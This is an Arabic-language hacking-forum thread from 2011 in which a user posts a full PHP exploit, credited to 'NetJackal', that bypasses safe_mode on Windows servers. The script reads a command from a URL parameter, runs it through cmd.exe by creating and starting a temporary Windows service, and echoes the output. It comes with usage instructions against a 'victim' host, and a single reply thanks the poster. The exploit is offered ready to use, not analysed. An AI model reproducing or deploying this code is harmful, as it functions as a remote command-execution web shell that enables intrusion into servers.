التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 07-04-2011, 07:51 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي php 5.x safe_mode bybass in server windows


السلام عليكم

كود:
 #####################################################
### PHP  safe_mode  bypass exploit (win32service) ###
### ###
### Note: Tested on 5.2.1 ###
### ###
### Author: NetJackal ###
### Email: nima_501[at]yahoo[dot]com ###
### Website: http://netjackal.by.ru ###
### ###
### ###
### Usage: http://victim.net/nj.php?CMD=[command] ###
#####################################################

$command=(isset($_GET['CMD']))?$_GET['CMD']:'dir'; #cammand
$dir=ini_get('upload_tmp_dir'); #Directory to store command's output

if(!extension_loaded('win32service'))die('win32service extension not found!');
$name=$dir."\\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
$exec=file_get_contents($name);
unlink($name);
echo "

".htmlspecialchars($exec)."";
?>

موفقين



php 5>x safe_mode bybass in server windows

   

رد مع اقتباس
قديم 07-04-2011, 05:14 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية migamix
 

 

 
إحصائية العضو





migamix غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
migamix is on a distinguished road

افتراضي


شكرا علي التغرة
موفق

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 11:00 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0